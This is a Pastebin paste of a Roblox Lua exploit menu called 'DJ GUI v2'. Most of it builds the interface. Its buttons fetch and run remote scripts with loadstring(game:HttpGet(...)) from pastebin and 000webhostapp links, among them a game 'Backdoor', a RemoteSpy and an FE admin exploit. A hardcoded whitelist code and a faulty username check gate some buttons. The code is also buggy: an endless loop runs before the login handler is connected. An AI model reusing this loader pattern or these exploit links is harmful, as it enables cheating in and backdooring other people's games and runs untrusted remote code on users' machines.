DJAlguein

Untitled

Nov 3rd, 2018
391
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.42 KB | None | 0 0
  1. -- Farewell infortality
  2. -- Revamp by ImFrostic, Version 2.81
  3.  
  4. -- Objects
  5. local user = game.Players.LocalPlayer
  6. local userid = game.Players.LocalPlayer.UserId
  7. local numba = 1
  8.  
  9. local login = false
  10. me = game.Players.LocalPlayer
  11. function remgui()
  12. for _,v in pairs(me.PlayerGui:GetChildren()) do
  13. if v.Name == "Modeshow" then
  14. v:remove()
  15. end
  16. end
  17. end
  18. function inform(text,delay)
  19. remgui()
  20. local sc = Instance.new("ScreenGui")
  21. sc.Parent = me.PlayerGui
  22. sc.Name = "Modeshow"
  23. local bak = Instance.new("Frame",sc)
  24. bak.BackgroundColor3 = Color3.new(1,1,1)
  25. bak.Size = UDim2.new(0.94,0,0.1,0)
  26. bak.Position = UDim2.new(0.03,0,0.037,0)
  27. bak.BorderSizePixel = 0
  28. local gi = Instance.new("TextLabel",sc)
  29. gi.Size = UDim2.new(0.92,0,0.09,0)
  30. gi.BackgroundColor3 = Color3.new(0,0,0)
  31. gi.Position = UDim2.new(0.04,0,0.042,0)
  32. gi.TextColor3 = Color3.new(1,1,1)
  33. gi.FontSize = "Size14"
  34. gi.Text = text
  35. coroutine.resume(coroutine.create(function()
  36. wait(delay)
  37. sc:remove()
  38. end))
  39. end
  40.  
  41. inform("DJ Initializing...",3)
  42.  
  43. local EasyGUI = Instance.new("ScreenGui")
  44. local main2 = Instance.new("Frame")
  45. local topname = Instance.new("Frame")
  46. local GUITitle = Instance.new("TextLabel")
  47. local mainbutton = Instance.new("TextButton")
  48. local bar = Instance.new("Frame")
  49. local GUImenu = Instance.new("TextButton")
  50. local credits = Instance.new("TextButton")
  51. local GUIframe = Instance.new("Frame")
  52. local LOFK2 = Instance.new("TextButton")
  53. local FEGUI = Instance.new("TextButton")
  54. local Shattervast = Instance.new("TextButton")
  55. local Backdoor = Instance.new("TextButton")
  56. local remotespy = Instance.new("TextButton")
  57. local ImageButton = Instance.new("ImageButton")
  58. local creditsframe = Instance.new("Frame")
  59. local extra = Instance.new("TextLabel")
  60. local whomade = Instance.new("TextLabel")
  61. local fescripts = Instance.new("Frame")
  62. local comingsoon = Instance.new("TextLabel")
  63. local moreinfo = Instance.new("TextLabel")
  64. local changelog = Instance.new("Frame")
  65. local title = Instance.new("TextLabel")
  66. local log = Instance.new("TextLabel")
  67. local closebutton = Instance.new("TextButton")
  68. local Openbuddon = Instance.new("Frame")
  69. local openbutton = Instance.new("TextButton")
  70. local intro = Instance.new("Frame")
  71. local TextLabel = Instance.new("TextLabel")
  72. local LoginFrame = Instance.new("Frame")
  73. local topbarr = Instance.new("Frame")
  74. local infopanel = Instance.new("TextLabel")
  75. local RBXLogin = Instance.new("TextButton")
  76. local seperate = Instance.new("Frame")
  77. local whitelist = Instance.new("TextBox")
  78. local Authenticate = Instance.new("TextButton")
  79.  
  80. -- Properties
  81.  
  82. EasyGUI.Name = "EasyGUI"
  83. EasyGUI.Parent = game.CoreGui
  84.  
  85. main2.Name = "main2"
  86. main2.Parent = EasyGUI
  87. main2.Active = true
  88. main2.BackgroundColor3 = Color3.new(0.164706, 0.917647, 1)
  89. main2.BorderSizePixel = 3
  90. main2.Position = UDim2.new(-2.0, 0, 0.342751831, 0)
  91. main2.Size = UDim2.new(0, 400, 0, 346)
  92.  
  93. topname.Name = "topname"
  94. topname.Parent = main2
  95. topname.BackgroundColor3 = Color3.new(0, 0, 0)
  96. topname.Size = UDim2.new(0, 400, 0, 17)
  97.  
  98. GUITitle.Name = "GUITitle"
  99. GUITitle.Parent = topname
  100. GUITitle.BackgroundColor3 = Color3.new(1, 1, 1)
  101. GUITitle.BackgroundTransparency = 1
  102. GUITitle.Position = UDim2.new(0.238893151, 0, -0.176470593, 0)
  103. GUITitle.Size = UDim2.new(0, 202, 0, 23)
  104. GUITitle.Font = Enum.Font.SourceSans
  105. GUITitle.Text = "DJ GUI v2"
  106. GUITitle.TextColor3 = Color3.new(1, 1, 1)
  107. GUITitle.TextSize = 14
  108.  
  109. mainbutton.Name = "mainbutton"
  110. mainbutton.Parent = main2
  111. mainbutton.BackgroundColor3 = Color3.new(0, 0, 0)
  112. mainbutton.BorderColor3 = Color3.new(1, 1, 1)
  113. mainbutton.Position = UDim2.new(0, 0, 0.0578034669, 0)
  114. mainbutton.Size = UDim2.new(0, 80, 0, 29)
  115. mainbutton.Style = Enum.ButtonStyle.RobloxRoundButton
  116. mainbutton.Font = Enum.Font.SourceSans
  117. mainbutton.Text = "FE Scripts"
  118. mainbutton.TextColor3 = Color3.new(0, 0, 0)
  119. mainbutton.TextSize = 14
  120. mainbutton.TextWrapped = true
  121.  
  122. bar.Name = "bar"
  123. bar.Parent = main2
  124. bar.Active = true
  125. bar.BackgroundColor3 = Color3.new(0, 0, 0)
  126. bar.BorderSizePixel = 0
  127. bar.Position = UDim2.new(0.204999998, 0, 0.0491329469, 0)
  128. bar.Selectable = true
  129. bar.Size = UDim2.new(0, 4, 0, 329)
  130.  
  131. GUImenu.Name = "GUImenu"
  132. GUImenu.Parent = main2
  133. GUImenu.BackgroundColor3 = Color3.new(1, 1, 1)
  134. GUImenu.BorderColor3 = Color3.new(1, 1, 1)
  135. GUImenu.Position = UDim2.new(0, 0, 0.14161849, 0)
  136. GUImenu.Size = UDim2.new(0, 80, 0, 29)
  137. GUImenu.Style = Enum.ButtonStyle.RobloxRoundButton
  138. GUImenu.Font = Enum.Font.SourceSans
  139. GUImenu.Text = "GUIs."
  140. GUImenu.TextColor3 = Color3.new(0, 0, 0)
  141. GUImenu.TextSize = 14
  142.  
  143. credits.Name = "credits"
  144. credits.Parent = main2
  145. credits.BackgroundColor3 = Color3.new(1, 1, 1)
  146. credits.BorderColor3 = Color3.new(1, 1, 1)
  147. credits.Position = UDim2.new(0, 0, 0.225433528, 0)
  148. credits.Size = UDim2.new(0, 80, 0, 29)
  149. credits.Style = Enum.ButtonStyle.RobloxRoundButton
  150. credits.Font = Enum.Font.SourceSans
  151. credits.Text = "Credits"
  152. credits.TextColor3 = Color3.new(0, 0, 0)
  153. credits.TextSize = 14
  154.  
  155. GUIframe.Name = "GUIframe"
  156. GUIframe.Parent = main2
  157. GUIframe.Active = true
  158. GUIframe.BackgroundColor3 = Color3.new(1, 1, 1)
  159. GUIframe.Position = UDim2.new(0.212500006, 0, 0.0549132936, 0)
  160. GUIframe.Size = UDim2.new(0, 315, 0, 327)
  161. GUIframe.Visible = false
  162.  
  163. LOFK2.Name = "LOFK2"
  164. LOFK2.Parent = GUIframe
  165. LOFK2.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
  166. LOFK2.Position = UDim2.new(0.0476190485, 0, 0.0581039749, 0)
  167. LOFK2.Size = UDim2.new(0, 200, 0, 50)
  168. LOFK2.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
  169. LOFK2.Font = Enum.Font.SourceSans
  170. LOFK2.Text = "LOTFK2"
  171. LOFK2.TextColor3 = Color3.new(0, 0, 0)
  172. LOFK2.TextSize = 30
  173. LOFK2.TextWrapped = true
  174.  
  175. FEGUI.Name = "FEGUI"
  176. FEGUI.Parent = GUIframe
  177. FEGUI.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
  178. FEGUI.Position = UDim2.new(0.0476190485, 0, 0.223241597, 0)
  179. FEGUI.Size = UDim2.new(0, 200, 0, 50)
  180. FEGUI.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
  181. FEGUI.Font = Enum.Font.SourceSans
  182. FEGUI.Text = "FE GUI"
  183. FEGUI.TextColor3 = Color3.new(0, 0, 0)
  184. FEGUI.TextSize = 30
  185. FEGUI.TextWrapped = true
  186.  
  187. Shattervast.Name = "Shattervast"
  188. Shattervast.Parent = GUIframe
  189. Shattervast.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
  190. Shattervast.Position = UDim2.new(0.0476190485, 0, 0.391437322, 0)
  191. Shattervast.Size = UDim2.new(0, 200, 0, 50)
  192. Shattervast.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
  193. Shattervast.Font = Enum.Font.SourceSans
  194. Shattervast.Text = "Shattervast"
  195. Shattervast.TextColor3 = Color3.new(0, 0, 0)
  196. Shattervast.TextSize = 30
  197. Shattervast.TextWrapped = true
  198.  
  199. Backdoor.Name = "Backdoor"
  200. Backdoor.Parent = GUIframe
  201. Backdoor.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
  202. Backdoor.Position = UDim2.new(0.0539682545, 0, 0.562691152, 0)
  203. Backdoor.Size = UDim2.new(0, 200, 0, 50)
  204. Backdoor.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
  205. Backdoor.Font = Enum.Font.SourceSans
  206. Backdoor.Text = "Adopt & Raise Backdoor"
  207. Backdoor.TextColor3 = Color3.new(0, 0, 0)
  208. Backdoor.TextSize = 30
  209. Backdoor.TextWrapped = true
  210.  
  211. remotespy.Name = "remotespy"
  212. remotespy.Parent = GUIframe
  213. remotespy.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
  214. remotespy.Position = UDim2.new(0.0507936515, 0, 0.730886877, 0)
  215. remotespy.Size = UDim2.new(0, 200, 0, 50)
  216. remotespy.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
  217. remotespy.Font = Enum.Font.SourceSans
  218. remotespy.Text = "RemoteSpy"
  219. remotespy.TextColor3 = Color3.new(0, 0, 0)
  220. remotespy.TextSize = 30
  221. remotespy.TextWrapped = true
  222.  
  223. ImageButton.Parent = GUIframe
  224. ImageButton.BackgroundColor3 = Color3.new(1, 1, 1)
  225. ImageButton.BorderSizePixel = 0
  226. ImageButton.Position = UDim2.new(0.701587319, 0, 0.391437322, 0)
  227. ImageButton.Size = UDim2.new(0, 84, 0, 80)
  228. ImageButton.Image = "rbxassetid://2530517466"
  229.  
  230. creditsframe.Name = "creditsframe"
  231. creditsframe.Parent = main2
  232. creditsframe.Active = true
  233. creditsframe.BackgroundColor3 = Color3.new(1, 1, 1)
  234. creditsframe.Position = UDim2.new(0.215000004, 0, 0.0491329469, 0)
  235. creditsframe.Size = UDim2.new(0, 314, 0, 329)
  236. creditsframe.Visible = false
  237.  
  238. extra.Name = "extra"
  239. extra.Parent = creditsframe
  240. extra.Active = true
  241. extra.BackgroundColor3 = Color3.new(1, 1, 1)
  242. extra.BackgroundTransparency = 1
  243. extra.Position = UDim2.new(0.181528658, 0, 0.0303951371, 0)
  244. extra.Size = UDim2.new(0, 200, 0, 50)
  245. extra.Font = Enum.Font.SourceSans
  246. extra.Text = "Created By: D.J Alguein#1337"
  247. extra.TextColor3 = Color3.new(0, 0, 0)
  248. extra.TextScaled = true
  249. extra.TextSize = 14
  250. extra.TextWrapped = true
  251.  
  252. whomade.Name = "whomade"
  253. whomade.Parent = creditsframe
  254. whomade.Active = true
  255. whomade.BackgroundColor3 = Color3.new(1, 1, 1)
  256. whomade.BackgroundTransparency = 1
  257. whomade.Position = UDim2.new(0.187898085, 0, 0.221884504, 0)
  258. whomade.Size = UDim2.new(0, 200, 0, 50)
  259. whomade.Font = Enum.Font.SourceSans
  260. whomade.Text = "Thanks to all those scripts included in this GUI."
  261. whomade.TextColor3 = Color3.new(0, 0, 0)
  262. whomade.TextScaled = true
  263. whomade.TextSize = 14
  264. whomade.TextWrapped = true
  265.  
  266. fescripts.Name = "fescripts"
  267. fescripts.Parent = main2
  268. fescripts.Active = true
  269. fescripts.BackgroundColor3 = Color3.new(1, 1, 1)
  270. fescripts.Position = UDim2.new(0.217500001, 0, 0.0520231202, 0)
  271. fescripts.Size = UDim2.new(0.782500029, 0, 0.947976887, 0)
  272. fescripts.Visible = false
  273.  
  274. comingsoon.Name = "comingsoon"
  275. comingsoon.Parent = fescripts
  276. comingsoon.Active = true
  277. comingsoon.BackgroundColor3 = Color3.new(1, 1, 1)
  278. comingsoon.BackgroundTransparency = 1
  279. comingsoon.Position = UDim2.new(0.178913742, 0, -0.00304878037, 0)
  280. comingsoon.Size = UDim2.new(0, 200, 0, 50)
  281. comingsoon.Font = Enum.Font.SourceSans
  282. comingsoon.Text = "FE Scripts :)"
  283. comingsoon.TextColor3 = Color3.new(0, 0, 0)
  284. comingsoon.TextSize = 14
  285.  
  286. moreinfo.Name = "moreinfo"
  287. moreinfo.Parent = fescripts
  288. moreinfo.Active = true
  289. moreinfo.BackgroundColor3 = Color3.new(1, 1, 1)
  290. moreinfo.BackgroundTransparency = 1
  291. moreinfo.Position = UDim2.new(0.178913742, 0, 0.182926834, 0)
  292. moreinfo.Size = UDim2.new(0, 200, 0, 50)
  293. moreinfo.Font = Enum.Font.SourceSans
  294. moreinfo.Text = "Yahoo! This is almost out. Will be coming in the next few days."
  295. moreinfo.TextColor3 = Color3.new(0, 0, 0)
  296. moreinfo.TextScaled = true
  297. moreinfo.TextSize = 14
  298. moreinfo.TextWrapped = true
  299.  
  300. changelog.Name = "changelog"
  301. changelog.Parent = main2
  302. changelog.BackgroundColor3 = Color3.new(1, 1, 1)
  303. changelog.Position = UDim2.new(0.215000004, 0, 0.0491329469, 0)
  304. changelog.Size = UDim2.new(0, 314, 0, 329)
  305.  
  306. title.Name = "title"
  307. title.Parent = changelog
  308. title.Active = true
  309. title.BackgroundColor3 = Color3.new(1, 1, 1)
  310. title.BorderSizePixel = 0
  311. title.Position = UDim2.new(0.181528658, 0, 0.0666666701, 0)
  312. title.Size = UDim2.new(0, 200, 0, 50)
  313. title.Font = Enum.Font.SourceSans
  314. title.Text = "Changelog:"
  315. title.TextColor3 = Color3.new(0, 0, 0)
  316. title.TextScaled = true
  317. title.TextSize = 14
  318. title.TextWrapped = true
  319.  
  320. log.Name = "log"
  321. log.Parent = changelog
  322. log.Active = true
  323. log.BackgroundColor3 = Color3.new(1, 1, 1)
  324. log.BorderSizePixel = 0
  325. log.Position = UDim2.new(0.178343952, 0, 0.227162182, 0)
  326. log.Size = UDim2.new(0, 200, 0, 204)
  327. log.Font = Enum.Font.SourceSans
  328. log.Text = "1. Hallo! Here's what has changed in v2: Added more scripts, and a login panel. 2. Improved Security. 3. Improved Anims. 4. Improved UI"
  329. log.TextColor3 = Color3.new(0, 0, 0)
  330. log.TextScaled = true
  331. log.TextSize = 14
  332. log.TextWrapped = true
  333.  
  334. closebutton.Name = "closebutton"
  335. closebutton.Parent = main2
  336. closebutton.BackgroundColor3 = Color3.new(1, 1, 1)
  337. closebutton.BackgroundTransparency = 1
  338. closebutton.BorderColor3 = Color3.new(1, 0, 0)
  339. closebutton.BorderSizePixel = 99
  340. closebutton.Position = UDim2.new(0.857500017, 0, 0, 0)
  341. closebutton.Size = UDim2.new(0, 70, 0, 16)
  342. closebutton.Font = Enum.Font.SourceSans
  343. closebutton.Text = "Close."
  344. closebutton.TextColor3 = Color3.new(1, 0, 0)
  345. closebutton.TextScaled = true
  346. closebutton.TextSize = 14
  347. closebutton.TextWrapped = true
  348.  
  349. Openbuddon.Name = "Openbuddon"
  350. Openbuddon.Parent = EasyGUI
  351. Openbuddon.BackgroundColor3 = Color3.new(0, 0, 0)
  352. Openbuddon.BorderColor3 = Color3.new(0.560784, 0, 0)
  353. Openbuddon.BorderSizePixel = 8
  354. Openbuddon.Position = UDim2.new(0.456685513, 0, 0.931203902, 0)
  355. Openbuddon.Size = UDim2.new(0, 100, 0, 34)
  356.  
  357. openbutton.Name = "openbutton"
  358. openbutton.Parent = Openbuddon
  359. openbutton.BackgroundColor3 = Color3.new(1, 1, 1)
  360. openbutton.BackgroundTransparency = 1
  361. openbutton.Position = UDim2.new(0.209999993, 0, 0, 0)
  362. openbutton.Size = UDim2.new(0, 58, 0, 30)
  363. openbutton.Font = Enum.Font.SourceSans
  364. openbutton.Text = "Open"
  365. openbutton.TextColor3 = Color3.new(1, 1, 1)
  366. openbutton.TextScaled = true
  367. openbutton.TextSize = 14
  368. openbutton.TextWrapped = true
  369.  
  370. intro.Name = "intro"
  371. intro.Parent = EasyGUI
  372. intro.BackgroundColor3 = Color3.new(0, 0, 0)
  373. intro.BorderColor3 = Color3.new(0.713726, 0.0117647, 0.701961)
  374. intro.BorderSizePixel = 4
  375. intro.Position = UDim2.new(0.452919006, 0, 0, 0)
  376. intro.Size = UDim2.new(0, 100, 0, 100)
  377.  
  378. TextLabel.Parent = intro
  379. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  380. TextLabel.BackgroundTransparency = 1
  381. TextLabel.Position = UDim2.new(-0.00999999978, 0, 0, 0)
  382. TextLabel.Size = UDim2.new(0, 101, 0, 100)
  383. TextLabel.Font = Enum.Font.ArialBold
  384. TextLabel.Text = "DJ"
  385. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  386. TextLabel.TextScaled = true
  387. TextLabel.TextSize = 14
  388. TextLabel.TextWrapped = true
  389.  
  390. LoginFrame.Name = "LoginFrame"
  391. LoginFrame.Parent = EasyGUI
  392. LoginFrame.Active = true
  393. LoginFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  394. LoginFrame.BorderSizePixel = 0
  395. LoginFrame.Position = UDim2.new(0.65630883, 0, 0.923832953, 0)
  396. LoginFrame.Size = UDim2.new(0, 295, 0, 419)
  397. LoginFrame.Style = Enum.FrameStyle.RobloxRound
  398.  
  399. topbarr.Name = "topbarr"
  400. topbarr.Parent = LoginFrame
  401. topbarr.Active = true
  402. topbarr.BackgroundColor3 = Color3.new(1, 1, 1)
  403. topbarr.BorderSizePixel = 0
  404. topbarr.Position = UDim2.new(-0.0298846755, 0, -0.0209307969, 0)
  405. topbarr.Size = UDim2.new(0, 295, 0, 51)
  406. topbarr.Style = Enum.FrameStyle.RobloxRound
  407.  
  408. infopanel.Name = "infopanel"
  409. infopanel.Parent = LoginFrame
  410. infopanel.Active = true
  411. infopanel.BackgroundColor3 = Color3.new(0.45098, 0.45098, 0.45098)
  412. infopanel.BackgroundTransparency = 1
  413. infopanel.BorderSizePixel = 0
  414. infopanel.Position = UDim2.new(0.159322038, 0, 0.145584732, 0)
  415. infopanel.Size = UDim2.new(0, 200, 0, 50)
  416. infopanel.Font = Enum.Font.SourceSans
  417. infopanel.Text = "Login: Please choose an option.."
  418. infopanel.TextColor3 = Color3.new(1, 1, 1)
  419. infopanel.TextScaled = true
  420. infopanel.TextSize = 14
  421. infopanel.TextWrapped = true
  422.  
  423. RBXLogin.Name = "RBXLogin"
  424. RBXLogin.Parent = LoginFrame
  425. RBXLogin.BackgroundColor3 = Color3.new(0.666667, 0.666667, 0)
  426. RBXLogin.BackgroundTransparency = 0.89999997615814
  427. RBXLogin.BorderColor3 = Color3.new(0, 1, 0)
  428. RBXLogin.BorderSizePixel = 0
  429. RBXLogin.Position = UDim2.new(-10, 0, 0.305489272, 0)
  430. RBXLogin.Size = UDim2.new(0, 200, 0, 50)
  431. RBXLogin.Font = Enum.Font.SourceSans
  432. RBXLogin.Text = "Log in with Rblx User."
  433. RBXLogin.TextColor3 = Color3.new(1, 1, 1)
  434. RBXLogin.TextScaled = true
  435. RBXLogin.TextSize = 14
  436. RBXLogin.TextWrapped = true
  437.  
  438. seperate.Name = "seperate"
  439. seperate.Parent = LoginFrame
  440. seperate.Active = true
  441. seperate.BackgroundColor3 = Color3.new(1, 1, 1)
  442. seperate.BorderSizePixel = 0
  443. seperate.Position = UDim2.new(-0.0306785461, 0, 0.461096287, 0)
  444. seperate.Size = UDim2.new(0, 296, 0, 11)
  445.  
  446. whitelist.Name = "whitelist"
  447. whitelist.Parent = LoginFrame
  448. whitelist.BackgroundColor3 = Color3.new(1, 1, 1)
  449. whitelist.BackgroundTransparency = 1
  450. whitelist.Position = UDim2.new(-10, 0, 0.546539366, 0)
  451. whitelist.Size = UDim2.new(0, 200, 0, 50)
  452. whitelist.Font = Enum.Font.SourceSans
  453. whitelist.Text = "WhiteList Code"
  454. whitelist.TextColor3 = Color3.new(1, 1, 1)
  455. whitelist.TextScaled = true
  456. whitelist.TextSize = 14
  457. whitelist.TextWrapped = true
  458.  
  459. Authenticate.Name = "Authenticate"
  460. Authenticate.Parent = LoginFrame
  461. Authenticate.BackgroundColor3 = Color3.new(1, 1, 1)
  462. Authenticate.BackgroundTransparency = 1
  463. Authenticate.Position = UDim2.new(0.132203385, 0, 0.720763743, 0)
  464. Authenticate.Size = UDim2.new(0, 200, 0, 50)
  465. Authenticate.Font = Enum.Font.SourceSans
  466. Authenticate.Text = "Authenticate."
  467. Authenticate.TextColor3 = Color3.new(1, 1, 1)
  468. Authenticate.TextScaled = true
  469. Authenticate.TextSize = 14
  470. Authenticate.TextWrapped = true
  471.  
  472. main2.Draggable = true
  473. LoginFrame.Draggable = true
  474.  
  475. intro:TweenPosition(UDim2.new(0.5,-50,0.5,-50), 'Out', 'Elastic', 3)
  476. wait(5)
  477. main2:TweenPosition(UDim2.new(0.185624018, 0, 0.373464376, 0), 'Out', 'Quad', 4)
  478. intro.Visible = false
  479. inform("Initialized.", 3)
  480.  
  481. -- Scripts
  482. EasyGUI.ResetOnSpawn = true
  483.  
  484.  
  485. closebutton.MouseButton1Click:Connect(function()
  486. main2:TweenPosition(UDim2.new(-0.5,0,0.345208853,0), 'In', 'Back',2)
  487. end)
  488.  
  489. openbutton.MouseButton1Click:Connect(function()
  490. main2:TweenPosition(UDim2.new(0.185624018, 0, 0.373464376, 0), 'In', 'Bounce',3)
  491. end)
  492.  
  493. GUImenu.MouseButton1Click:Connect(function()
  494. GUImenu.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  495. credits.Style = Enum.ButtonStyle.RobloxRoundButton
  496. mainbutton.Style = Enum.ButtonStyle.RobloxRoundButton
  497. changelog.Visible = false
  498. creditsframe.Visible = false
  499. fescripts.Visible = false
  500. GUIframe.Visible = true
  501. end)
  502.  
  503. mainbutton.MouseButton1Click:Connect(function()
  504. GUImenu.Style = Enum.ButtonStyle.RobloxRoundButton
  505. credits.Style = Enum.ButtonStyle.RobloxRoundButton
  506. mainbutton.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  507. changelog.Visible = false
  508. creditsframe.Visible = false
  509. GUIframe.Visible = false
  510. fescripts.Visible = true
  511. end)
  512.  
  513. credits.MouseButton1Click:Connect(function()
  514. GUImenu.Style = Enum.ButtonStyle.RobloxRoundButton
  515. credits.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  516. mainbutton.Style = Enum.ButtonStyle.RobloxRoundButton
  517. changelog.Visible = false
  518. GUIframe.Visible = false
  519. fescripts.Visible = false
  520. creditsframe.Visible = true
  521. end)
  522.  
  523. Backdoor.MouseButton1Click:Connect(function()
  524. if login == false then
  525. local m = Instance.new('Message',game.Workspace)
  526. m.Text = "Hold up bud, you need to be logged in to use this CMD. Try some others if you do not have access!"
  527. wait(4)
  528. m:Remove()
  529. else
  530. loadstring(game:HttpGet("https://pastebin.com/raw/Kv6cdnAW", true))()
  531. inform("Backdoor Ran :D",3)
  532. end
  533. end)
  534.  
  535. remotespy.MouseButton1Click:Connect(function()
  536. loadstring(game:HttpGet("https://mrspyv2source.000webhostapp.com/", true))()
  537. inform("Mr.Spy v2 Ran :)", 3)
  538. end)
  539.  
  540. LOFK2.MouseButton1Click:Connect(function()
  541. loadstring(game:HttpGet("https://pastebin.com/raw/vmLRb6pE", true))()
  542. inform("Lol, I guess if you wanna use my GUI for a bad RPG game thats fine", 3)
  543. end)
  544.  
  545. ImageButton.MouseButton1Click:Connect(function()
  546. LoginFrame.Visible = true
  547. LoginFrame:TweenPosition(UDim2.new(0.679,0,0.183,0), 'Out', 'Bounce', 5)
  548. wait(2)
  549. RBXLogin:TweenPosition(UDim2.new(0.142,0,0.305,0),'In', 'Elastic', 5)
  550. wait(2)
  551. whitelist:TweenPosition(UDim2.new(0.156,0,0.547,0),'In', 'Elastic', 5)
  552. end)
  553.  
  554. RBXLogin.MouseButton1Click:Connect(function()
  555. if user == game.Players.albie368 or game.Players.albie3682 then
  556. login = true
  557. inform('Woop! You have successfully logged in with your USERID.', 3)
  558. wait(3)
  559. LoginFrame:TweenPosition(UDim2.new(0.65630883, 0, 0.923832953, 0), 'Out', 'Back', 5)
  560. wait(5)
  561. LoginFrame.Visible = false
  562. else
  563. inform("Your USERID Is not whitelisted. Make sure you are using an acc that has been whitelisted, not an alt.", 3)
  564. wait(3)
  565. inform("Maybe if you try logging in with your WL :)", 3)
  566. end
  567. end)
  568.  
  569. Shattervast.MouseButton1Click:Connect(function()
  570. inform("Shattervast loading. (FE ADMIN)", 3)
  571. loadstring(game:HttpGet("https://pastebin.com/raw/wxeQE5Lb", true))()
  572. end)
  573. FEGUI.MouseButton1Click:Connect(function()
  574. if login == false then
  575. local m = Instance.new('Message',game.Workspace)
  576. m.Text = "Hold up bud, you need to be logged in to use this CMD. Try some others if you do not have access!"
  577. wait(4)
  578. m:Remove()
  579. else
  580. loadstring(game:HttpGet("https://pastebin.com/raw/UmhaEvTT",true))()
  581. end
  582. end)
  583.  
  584. local text = "D.J GUI v2 BETA - WIP"
  585.  
  586.  
  587. while true do
  588. if numba == 2 then
  589. wait(10)
  590. local numba = 1
  591. local text = "D.J GUI v2 BETA - WIP"
  592. for i = 1, #text do
  593. GUITitle.Text = string.sub(text, 1, i)
  594. wait(0.2)
  595. end
  596. else
  597. wait(10)
  598. local numba = 2
  599. local text = "DJ GUI"
  600. for i = 1, #text do
  601. GUITitle.Text = string.sub(text, 1, i)
  602. wait(0.2)
  603. end
  604. end
  605. end
  606.  
  607. Authenticate.MouseButton1Click:Connect(function()
  608. if whitelist.Text == 'awd' then
  609. whitelist.Text = 'Yuh'
  610. login = true
  611. inform("Successfully logged in using WL ID.", 5)
  612. wait(5)
  613. LoginFrame:TweenPosition(UDim2.new(1, 0, 0.923832953, 0), 'Out', 'Back', 5)
  614. wait(5)
  615. LoginFrame.Visible = false
  616. else
  617. inform("Your WL Code is invalid.", 5)
  618. wait(5)
  619. inform("Try again", 2)
  620. end
  621. end)
Advertisement
Add Comment
Please, Sign In to add comment